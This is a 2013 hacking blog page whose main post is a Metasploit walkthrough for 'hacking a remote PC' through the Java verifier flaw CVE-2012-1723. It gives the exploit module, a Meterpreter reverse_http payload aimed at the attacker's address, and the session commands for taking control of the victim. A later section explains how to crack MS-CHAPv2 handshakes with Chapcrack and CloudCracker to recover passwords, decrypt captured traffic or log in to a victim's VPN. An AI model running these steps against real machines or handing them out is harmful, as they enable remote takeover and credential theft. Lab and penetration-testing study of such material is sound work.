Tuesday, May 14, 2013

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.


Attacker Machine: Backtrack
Victim Machine: Windows (install JRE un-patched version  )

Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:

msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.
Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.


POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
Metasploit Module: http://www.exploit-db.com/exploits/19717/

How to connect ssl to backtrack using putty

The video is created by Vishnu Sharma. In this video he has showed u how to run ssh service in u r backtrack or any Linux machine using putty.The download link of putty: http://putty.org

Web Vulnerability]cross site scripting part 1

Tutorial Target Web Vulnerability]cross site scripting part 1

Chapcrack: A tool for cracking MS-CHAPv2 network handshakes

Chapcrack is a tool for parsing and decrypting MS-CHAPv2 network handshakes. In order to use it, a packet with an MS-CHAPv2 network handshake must be obtained. The tool is used to parse relevant credentials from the handshake. In other words, Chapcrack parses the credential information out of MS-CHAPv2 handshakes, sends to Cloudcracker which in turn will return a packet that can be decrypted by Chapcrack to recover the password.

The resulting file (“token”) is then submitted to CloudCracker, an online password cracking service for penetration testers and network auditors, which returns the cracked MD4 hash in under a day. For each handshake, it outputs the username, known plaintext, two known ciphertexts, and will crack the third DES key. Whats interesting to know is that Cloudcracker forwards your handshake information to a Pico Computing’s DES cracking box, which is powered by a FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second!

The hash is inserted into chapcrack, and the entire network capture is decrypted. Alternatively, it can be used to login to the user’s VPN service or WPA2 Enterprise radius server. All of this is possible only because of the weak protocol architecture that allows MD4 hash of the user’s password to be authenticated as them, as well as to decrypt any of their traffic.

How to use chapcrack?

Obtain a packet capture with an MS-CHAPv2 network handshake in it (PPTP VPN or WPA2 Enterprise handshake, for instance).
Use chapcrack to parse relevant credentials from the handshake (chapcrack parse -i path/to/capture.cap).
Submit the CloudCracker token to www.cloudcracker.com
Get your results, and decrypt the packet capture (chapcrack decrypt -i path/to/capture.cap -o output.cap -n ).Download MS-CHAPv2 Here


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